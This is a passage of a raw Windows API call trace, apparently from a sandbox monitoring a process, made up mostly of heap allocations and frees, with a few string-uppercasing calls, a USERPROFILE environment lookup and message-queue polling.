[0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0211.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.118] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.118] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.121] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0211.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.122] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0211.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.123] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.126] 